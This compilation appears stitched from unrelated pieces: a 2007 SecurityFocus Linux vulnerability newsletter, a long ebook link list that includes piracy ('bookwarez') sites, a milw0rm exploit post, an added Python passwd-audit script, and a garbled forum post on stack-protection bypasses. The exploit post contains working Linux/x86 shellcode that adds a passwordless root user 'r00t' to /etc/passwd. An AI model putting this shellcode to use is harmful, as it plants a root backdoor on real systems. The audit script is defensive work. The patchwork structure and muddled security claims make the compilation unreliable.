
SecurityFocus Linux Newsletter #361  

This issue is Sponsored by: CSI

CSI 2007, November 3-9 in Washington, DC, is the only conference that delivers a business-focused overview of enterprise security.
It will convene 2,000+ delegates, 80 exhibitors and features 100+ sessions/seminars providing a roadmap for integrating policies and procedures with new tools and techniques.
Register now for savings on conference fees and/or free exhibits admission.
www.csiannual.com
SECURITY BLOGS
SecurityFocus has selected a few syndicated sources that stand out as conveying topics of interest for our community. We are proud to offer content from Matasano at this time and will be adding more in the coming weeks.
http://www.securityfocus.com/blogs
------------------------------------------------------------------
I. FRONT AND CENTER
1. Rebinding attacks unbound
2. Aspect-Oriented Programming and Security
II. LINUX VULNERABILITY SUMMARY
1. Red Hat Linux Kernel Stack Unwinder Local Denial Of Service Vulnerability
2. Linux Kernel eHCA Driver Physical Address Space Information Disclosure Vulnerability
3. 3proxy FTP Proxy Double Free Memory Corruption Vulnerability
4. Sun Java Runtime Environment Virtual Machine Remote Privilege Escalation Vulnerability
5. Gnome-Screensaver With Compiz Lock Bypass Vulnerability
6. XEN Xenmon.py Xenbaked Insecure Temporary File Creation Vulnerability
7. JustSystem Ichitaro JSTARO4.OCX and TJSVDA.DLL Multiple Buffer Overflow Vulnerabilities
8. Trend Micro AntiVirus Engine Tmxpflt.SYS Local Buffer Overflow Vulnerability
9. RealNetworks RealPlayer File Parsing Routines Multiple Vulnerabilities
10. vobcopy vobcopy.bla Insecure Temporary File Creation Vulnerability
11. Liferea Feedlist.OPML Local Information Disclosure Vulnerability
12. CUPS IPP Tag Handling Remote Buffer Overflow Vulnerability
13. McAfee E-Business Server Authentication Packet Handling Integer Overflow Vulnerability
14. Mono System.Math BigInteger Buffer Overflow Vulnerability
III. LINUX FOCUS LIST SUMMARY
1. Linux Hardening
IV. UNSUBSCRIBE INSTRUCTIONS
V. SPONSOR INFORMATION

I. FRONT AND CENTER
---------------------
1. Rebinding attacks unbound
By Federico Biancuzzi
DNS rebinding was discovered in 1996 and affected the Java Virtual Machine (VM). Recently a group of researchers at Stanford found out that this vulnerability is still present in browsers and that the common solution, known as DNS pinning, is not effective anymore.
http://www.securityfocus.com/columnists/455

2. Aspect-Oriented Programming
By Rohit Sethi
Aspect-oriented programming (AOP) is a paradigm that is quickly gaining traction in the development world. At least partially spurred by the popularity of the Java Spring framework [1], people are beginning to understand the substantial benefits that AOP brings to development.
http://www.securityfocus.com/infocus/1895


II. LINUX VULNERABILITY SUMMARY
------------------------------------
1. Red Hat Linux Kernel Stack Unwinder Local Denial Of Service Vulnerability
BugTraq ID: 26158
Remote: No
Date Published: 2007-10-22
Relevant URL: http://www.securityfocus.com/bid/26158
Summary:
The Red Hat Linux kernel is prone to a local denial-of-service vulnerability.

A local attacker can exploit this issue to crash the affected kernel, denying service to legitimate users.

2. Linux Kernel eHCA Driver Physical Address Space Information Disclosure Vulnerability
BugTraq ID: 26161
Remote: No
Date Published: 2007-10-22
Relevant URL: http://www.securityfocus.com/bid/26161
Summary:
The Linux kernel is prone to an information-disclosure vulnerability.

Successful exploits will allow attackers to obtain a portion of the physical address space. Information harvested may aid in further attacks.

3. 3proxy FTP Proxy Double Free Memory Corruption Vulnerability
BugTraq ID: 26180
Remote: Yes
Date Published: 2007-10-23
Relevant URL: http://www.securityfocus.com/bid/26180
Summary:
3proxy is prone to a double-free memory-corruption vulnerability.

Attackers may be able to exploit this issue to cause denial-of-service conditions.

This issue affects 3proxy 0.5.3i; other versions may also be vulnerable.

4. Sun Java Runtime Environment Virtual Machine Remote Privilege Escalation Vulnerability
BugTraq ID: 26185
Remote: Yes
Date Published: 2007-10-23
Relevant URL: http://www.securityfocus.com/bid/26185
Summary:
The Sun Java Runtime Environment is prone to a remote privilege-escalation vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers.

5. Gnome-Screensaver With Compiz Lock Bypass Vulnerability
BugTraq ID: 26188
Remote: No
Date Published: 2007-10-23
Relevant URL: http://www.securityfocus.com/bid/26188
Summary:
Gnome-screensaver is prone to a vulnerability that allows an attacker who has physical console access to bypass the user's locked screen.

This issue affects gnome-screensaver released with Ubuntu 7.10; fixes from Ubuntu are available; other versions may also be affected.

6. XEN Xenmon.py Xenbaked Insecure Temporary File Creation Vulnerability
BugTraq ID: 26190
Remote: No
Date Published: 2007-10-23
Relevant URL: http://www.securityfocus.com/bid/26190
Summary:
Xen is prone to a security vulnerability because it creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to perform symlink attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to overwrite or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

This issue affects Xen 3.0; other versions may also be vulnerable.

7. JustSystem Ichitaro JSTARO4.OCX and TJSVDA.DLL Multiple Buffer Overflow Vulnerabilities
BugTraq ID: 26206
Remote: Yes
Date Published: 2007-10-25
Relevant URL: http://www.securityfocus.com/bid/26206
Summary:
JustSystem Ichitaro is prone to multiple unspecified buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers.

Successful exploits may allow attackers to execute arbitrary code in the context of a vulnerable application; failed attempts will likely cause denial-of-service conditions.

These issues affect these versions:

Ichitaro 11, 12, 13, 2004, 2005, 2006, 2007
Ichitaro for Linux
Ichitaro Lite2
Punch
Ichitaro viewer

Other versions may also be affected.

8. Trend Micro AntiVirus Engine Tmxpflt.SYS Local Buffer Overflow Vulnerability
BugTraq ID: 26209
Remote: No
Date Published: 2007-10-25
Relevant URL: http://www.securityfocus.com/bid/26209
Summary:
Trend Micro AntiVirus engine is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

Successful exploits may allow an attacker to execute arbitrary machine code with SYSTEM-level privileges and completely compromise affected computers. Failed exploit attempts could crash the computer, denying service to legitimate users.

Applications that incorporate 'Tmxpflt.sys' 8.320.1004 and 8.500.0.1002 from the AntiVirus engine are vulnerable, including Trend Micro PC-cillin Internet Security 2007, ServerProtect, and OfficeScan.

9. RealNetworks RealPlayer File Parsing Routines Multiple Vulnerabilities
BugTraq ID: 26214
Remote: Yes
Date Published: 2007-10-25
Relevant URL: http://www.securityfocus.com/bid/26214
Summary:
RealNetworks RealPlayer is prone to multiple memory-corruption vulnerabilities that arise when the application processes specially crafted files.

Successfully exploiting these issues will allow remote attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will cause a denial-of-service condition.

10. vobcopy vobcopy.bla Insecure Temporary File Creation Vulnerability
BugTraq ID: 26233
Remote: No
Date Published: 2007-10-29
Relevant URL: http://www.securityfocus.com/bid/26233
Summary:
The 'vobcopy' tool creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to perform symlink attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to overwrite or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

11. Liferea Feedlist.OPML Local Information Disclosure Vulnerability
BugTraq ID: 26254
Remote: No
Date Published: 2007-10-30
Relevant URL: http://www.securityfocus.com/bid/26254
Summary:
Liferea is prone to a local information-disclosure vulnerability because the application fails to set file permissions correctly on a backup file.

Attackers can leverage this issue to obtain sensitive information used to construct valid login credentials.

This issue affects versions prior to Liferea 1.4.6.

12. CUPS IPP Tag Handling Remote Buffer Overflow Vulnerability
BugTraq ID: 26268
Remote: Yes
Date Published: 2007-10-31
Relevant URL: http://www.securityfocus.com/bid/26268
Summary:
CUPS is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial of service.

CUPS 1.3.3 is reported vulnerable; other versions may be affected as well.

13. McAfee E-Business Server Authentication Packet Handling Integer Overflow Vulnerability
BugTraq ID: 26269
Remote: Yes
Date Published: 2007-10-31
Relevant URL: http://www.securityfocus.com/bid/26269
Summary:
The application is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun.

Successfully exploiting this issue may allow attackers to execute arbitrary code within the context of the affected application. This in turn may result in a complete compromise of the affected system. Failed exploit attempts will result in a denial of service.

The issue affects McAfee E-Business Server 8.1.1 for Linux and 8.5.2 for Solaris. Versions for Windows are not affected.

14. Mono System.Math BigInteger Buffer Overflow Vulnerability
BugTraq ID: 26279
Remote: Yes
Date Published: 2007-10-31
Relevant URL: http://www.securityfocus.com/bid/26279
Summary:
Mono is prone to a buffer-overflow vulnerability because the application fails to adequately perform boundary checks on user-supplied data.

Successfully exploiting this issue could allow attackers to execute arbitrary code in the context of the user running an affected application. Failed exploit attempts will likely result in a denial-of-service condition.

III. LINUX FOCUS LIST SUMMARY
---------------------------------
1. Linux Hardening
http://www.securityfocus.com/archive/91/482082


Collection of Free Ebook Links

Here is a collection of free ebook links; feel free to study them.

List of free E-books O'Reilly online
http://www.oreilly.com/openbook/
http://sysadmin.oreilly.com/

Computer books and manuals
http://www.hoganbooks.com/freebook/webbooks.html
http://www.informit.com/itlibrary/
http://www.fore.com/support/manuals/home/home.htm
http://www.adobe.com/products/acrobat/webbuy/freebooks.html

The Network Book
http://www.cs.columbia.edu/netbook/

Some #bookwarez.efnet.irc links
http://www.extrema.net/books/links.shtml

Some #bookwarez.efnet.irc fiction
http://194.58.154.90:4431/enscifi/

Pimpas online books (Indonesia)
http://202.159.16.55/~pimpa2000
http://202.159.15.46/~om-pimpa/buku

Security, privacy and cryptography
http://theory.lcs.mit.edu/~rivest/crypto-security.html
http://www.oberlin.edu/~brchkind/cyphernomicon/

My own misc online reading material
http://www.eastcoastfx.com/docs/admin-guides/
http://www.eastcoastfx.com/~jorn/reading/

Computer books
http://solaris.inorg.chem.msu.ru/cs-books/
http://sweetrude.net/~cab/books/
http://alaska.mine.nu/books/
http://poprocks.dyn.ns.ca/dave/books/
http://58-160.skarland.uaf.edu/books/
http://202.186.247.194/~ebook/
http://hooligans.org/reference/

Linux documentation
http://www.linuxdoc.org/docs.html

FreeBSD documentation
http://www.freebsd.org/tutorials/

Sun documentation
http://osiris.imw.tu-clausthal.de:8888/
http://uran.vvsu.ru:8888/

SGI documentation
http://newton.unicc.chalmers.se/ebt-bin/nph-dweb/dynaweb;td=2
http://techpubs.sgi.com/library/tpl/cgi-bin/init.cgi

IBM Online Redbooks
http://www.redbooks.ibm.com/

Digital Unix documentation
http://www.unix.digital.com/faqs/publications/base_doc/DOCUMENTATION/V40D_HTML/V40D_HTML/LIBRARY.HTM

Filesystem Hierarchy Standard
http://www.pathname.com/fhs/2.0/fhs-toc.html
http://www.linuxbase.com/

UNIX stuff
http://www.ucs.ed.ac.uk/~unixhelp/index.html
http://www.uwsg.indiana.edu/usail/
http://www.isu.edu/departments/comcom/unix/workshop/unixindex.html
http://www.franken.de/users/lorien/unix.html
http://www.cs.buffalo.edu/~milun/unix.programming.html

Programmers reading
http://www.programmersheaven.com/
http://www.cs.monash.edu.au/~alanf/se_proj97/

Programming Pearls 2nd edition
http://www.cs.bell-labs.com/cm/cs/pearls/

C stuff
http://www.strath.ac.uk/CC/Courses/NewCcourse/ccourse.html
http://www.cm.cf.ac.uk/Dave/C/CE.html
http://www.cprogramming.com/tutorial.html
http://www.cs.virginia.edu/c++programdesign/slides/
http://www.icce.rug.nl/docs/cplusplus/cplusplus.html

Perl stuff
http://www.webdesigns1.com/perl/ir.html
http://www.ictp.trieste.it/texi/perl/perl_toc.html
http://www.itknowledge.com/tpj/
http://www.plover.com/~mjd/perl/

Java stuff
http://www.cs.brown.edu/courses/cs016/book/
http://polaris.cis.ksu.edu/~schmidt/CIS200/
http://www.daimi.au.dk/dProg1/java/langspec-1.0/index.html

Lisp stuff
http://www.cs.cmu.edu/afs/cs.cmu.edu/project/airepository/ai/html/cltl/mirrors.html
http://www.cs.tulane.edu/www/Villamil/lisp/

Ada stuff
http://www.adahome.com/Tutorials/

Database reading
http://www.bus.orst.edu/faculty/brownc/lectures/db_tutor/index.htm

SQL stuff
http://w3.one.net/~jhoffman/sqltut.htm
http://www.doc.mmu.ac.uk/STAFF/E.Ferneley/SQL/index.htm
http://www.daimi.au.dk/~oracle/sql/index.html

Visual Basic stuff
http://www.vb-world.net/books/

Handbook of Applied Cryptography
http://www.cacr.math.uwaterloo.ca/hac/

X Window System
http://tronche.com/gui/x/
http://www.cen.com/mw3/refs.html
http://www.gaijin.com/X/

GTK and Gnome stuff
http://developer.gnome.org/doc/GGAD/ggad.html

QT and KDE stuff
http://www.troll.no/qt/
http://developer.kde.org/documentation/tutorials/index.html
http://www.arrakis.es/~rlarrosa/tutorial.html

Corba stuff
http://www.iona.com/hyplan/vinoski/

TCP/IP info
http://www.tunix.kun.nl/ptr/tcpip.html

Misc programmers reading
http://www.cs.wisc.edu/~chilimbi/Pubs.html
http://www.ic.arizona.edu/~nromano/spring99/readings.htm

Some useful tech articles
http://www.sysadminmag.com/
http://www.dotcomma.org/

Considering Hacking Constructive
http://www.firstmonday.dk/issues/issue4_2/gisle/index.html

Eric's Random Writings
http://www.tuxedo.org/~esr/writings/

IBM's History
http://www.ibm.com/ibm/history/story/text.html

Electronic Publishing
http://www.civeng.carleton.ca/~nholtz/ElectronicPublishing.html

Digital processing
http://www.dspguide.com/pdfbook.htm

The Hardware Book
http://sunsite.auc.dk/hwb/

Network iQ Router Reference Manual
http://www.teltrend.co.nz/documentation/networkiq/rel74/html/rmtoc.htm

Cisco Product Documentation
http://www.cisco.com/univercd/cc/td/doc/product/

Novell developers appnotes
http://developer.novell.com/research/appnotes/

Icons for your desktop
http://nether.tky.hut.fi/iconstore/

Symbols and signs and ideograms and stuff
http://www.symbols.com/

Dictionaries
http://www.ohiolink.edu/db/oed.html
http://www.ohiolink.edu/db/ahd.html
http://www.ohiolink.edu/db/columbia.html
http://www.ohiolink.edu/db/thes.html
http://www.eb.com:180/

Misc reading material
http://dali.orgland.ru/tcd/
http://www.ud.se/english/press/pdf_publ.htm

Dantes Inferno
http://sophia.smith.edu/~lkleinbe/dante/home.html
http://www.divinecomedy.org/

Books and texts
http://digital.library.upenn.edu/books/
http://www.cs.cmu.edu/books.html
http://www.ipl.org/reading/books/
http://www.nakedword.org/
http://sunsite.berkeley.edu/alex/

Literature stuff
http://lion.chadwyck.co.uk:8080/
http://www.swan.ac.uk/uwp/lit.htm

Octavo books
http://www.octavo.com/

Project Gutenberg - books and texts
http://www.promo.net/pg/

Project Runeberg - Scandinavian in books and texts
http://www.lysator.liu.se/runeberg/katalog.html

The Elements of Style
http://www.bartleby.com/141/index.html

Bigtext - illustrated books and manuals for DOS
http://www.ozemail.com.au/~kevsol/oldfav.html#bigtext

Breeze - a complete text system for Windows
http://www.ozemail.com.au/~kevsol/sware.html#brzwin

Language links
http://www.june29.com/HLP/

Grimms' fairy tales
http://www.nationalgeographic.com/grimm/archive.html

Winnie the Pooh
http://www.machaon.ru/pooh/

Seven Wonders of the World
http://ce.eng.usf.edu/pharos/wonders/

Medieval history
http://www.fordham.edu/halsall/sbook2.html

Misc history
http://www.usaor.net/users/ipm/contents.html
http://www.homeusers.prestel.co.uk/littleton/re0_cath.htm

Stonehenges Legends
http://www.missgien.net/stonehenge/legends.html

In Parentheses historical papers
http://www.inpar.dhs.org/

Bulfinchs Mythology
http://www.bulfinch.org/

The Dead Sea Scrolls
http://lcweb.loc.gov/exhibits/scrolls/toc.html

Qumran historical site
http://www.kalia.org.il/Qumran/

Index of cults
http://www.totentanz.de/kmedeke/cults.htm

Heretical speculation
http://www.calweb.com/~queribus/gnosticgnus.html

The esoteric Ordo Supremus Militaris Templi Hierosolymitani
http://www.osmth.org/index.html

Runes and Norse stuff
http://www.multiart.nu/grimner/
http://www.eastcoastfx.com/~jorn/runes/

Extinction level events
http://members.xoom.com/korwisi/ele/english/index.html
http://impact.arc.nasa.gov/
http://www.boulder.swri.edu/clark/ncar.html

Stephen Hawkings Universe
http://www.pbs.org/wnet/hawking/html/home.html

The constellations
http://www.dibonsmith.com/constel.htm

Falling into a black hole
http://casasrv.colorado.edu/~ajsh/schw.shtml

Gravity is a push
http://www.epicom.com/gravitypush/

Online audiobooks
http://www.broadcast.com/books/scifi/

ElecBooks
http://www.elecbook.com/eblist.htm

NewMedia Classics
http://www.newmediaclassics.com/

Online Books Archive
http://docs.online.bg/

Internet Public Library
http://www.ipl.org/

Rocket-Library.com
http://www.rocket-library.com/categories.asp

PalmPilot E-Text Ring
http://www.webring.org/cgi-bin/webring?ring=pilot_text&id=2&List

Virtual Free Books
http://www.virtualfreesites.com/free.books.am.html

About Ebooks
http://aalbc.com/ebooks/Allaboutebooks.htm


Exploit on linux/86

/* By Kris Katterjohn 11/14/2006
 *
 * 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd
 *
 * for Linux/x86
 *
 *
 *
 * section .text
 *
 *      global _start
 *
 * _start:
 *
 * ; open("/etc//passwd", O_WRONLY | O_APPEND)
 *
 *      push byte 5
 *      pop eax
 *      xor ecx, ecx
 *      push ecx
 *      push 0x64777373
 *      push 0x61702f2f
 *      push 0x6374652f
 *      mov ebx, esp
 *      mov cx, 02001Q
 *      int 0x80
 *
 *      mov ebx, eax
 *
 * ; write(ebx, "r00t::0:0:::", 12)
 *
 *      push byte 4
 *      pop eax
 *      xor edx, edx
 *      push edx
 *      push 0x3a3a3a30
 *      push 0x3a303a3a
 *      push 0x74303072
 *      mov ecx, esp
 *      push byte 12
 *      pop edx
 *      int 0x80
 *
 * ; close(ebx)
 *
 *      push byte 6
 *      pop eax
 *      int 0x80
 *
 * ; exit()
 *
 *      push byte 1
 *      pop eax
 *      int 0x80
 */

int main(void)
{
	char shellcode[] =
		"\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68"
		"\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66"
		"\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2"
		"\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68"
		"\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a"
		"\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80";

	/* treat the byte array as a function and call it */
	(*(void (*)()) shellcode)();
}



// milw0rm.com [2006-11-17]


linux/x86 add root user r00t with no password to /etc/passwd 69 bytes
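
A defender-side check for the entry this payload appends, as an added example that is not part of the original post: it parses passwd-format text and flags empty password fields, UID 0 accounts other than root, malformed lines, and a missing final newline (the payload writes exactly 12 bytes with no newline). `audit_passwd`, `Finding` and the sample data are names and values constructed for this illustration.

```python
from typing import List, NamedTuple, Sequence

# Constructed sample: an ordinary passwd file followed by the 12 bytes the
# payload writes ("r00t::0:0:::"), which arrive without a trailing newline.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
    "r00t::0:0:::"
)


class Finding(NamedTuple):
    line_no: int
    user: str
    reason: str


def audit_passwd(text: str,
                 allowed_uid0: Sequence[str] = ("root",)) -> List[Finding]:
    """Return findings for suspicious entries in passwd-format text."""
    findings: List[Finding] = []
    lines = text.splitlines()
    for line_no, line in enumerate(lines, start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        user = fields[0]
        # A valid entry has exactly 7 colon-separated fields. If the file
        # had no final newline before the append, the new entry is glued
        # onto the previous line and shows up here as a malformed line.
        if len(fields) != 7:
            findings.append(
                Finding(line_no, user, "malformed entry: expected 7 fields"))
            continue
        # Field 2 empty means the account needs no password at all.
        if fields[1] == "":
            findings.append(Finding(line_no, user, "empty password field"))
        try:
            uid = int(fields[2])
        except ValueError:
            findings.append(Finding(line_no, user, "non-numeric UID"))
            continue
        # Any UID 0 name outside the allow-list has full root privileges.
        if uid == 0 and user not in allowed_uid0:
            findings.append(
                Finding(line_no, user, "UID 0 account other than root"))
    # Tools that maintain passwd end the file with a newline; a raw
    # write() of a bare entry, as in the payload above, does not.
    if lines and not text.endswith("\n"):
        findings.append(
            Finding(len(lines), lines[-1].split(":")[0],
                    "file does not end with a newline"))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.line_no}: {f.user}: {f.reason}")
```

To audit a live system, pass the contents of `/etc/passwd` to `audit_passwd` and extend `allowed_uid0` only with UID 0 accounts you have deliberately created.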




Comparison of Linux vs FreeBSD vs OpenBSD

Linux (most Linux distributions):

Stack protection uses virtual addresses, randomized stack
overflow handling uses SIGSEGV, the stack can be overwritten
very easy to bypass va

FreeBSD 6.1:

overflow handling uses SIGSEGV, the stack can be overwritten
bypassing the stack shield still fails, because I'm not a FreeBSD user

OpenBSD 3.9:

overflow handling uses SIGABRT, the overflow is killed with sys_kill()
very hard to overwrite the stack, non-executable stack protection
it seems impossible to exploit a stack overflow in OpenBSD

returning libc?? it gets hit with SIGABRT as well

PoC:

linux http://student.te.ugm.ac.id/~phoenix03/compare.txt
freebsd ??
openbsd ??

Does anyone want to add references on bypassing stack protection on BSD machines? Thanks if you have any references.

Kecoak Elektronik Indonesia :: View topic - stack overflow exploitation (Linux vs FreeBSD vs OpenBSD)



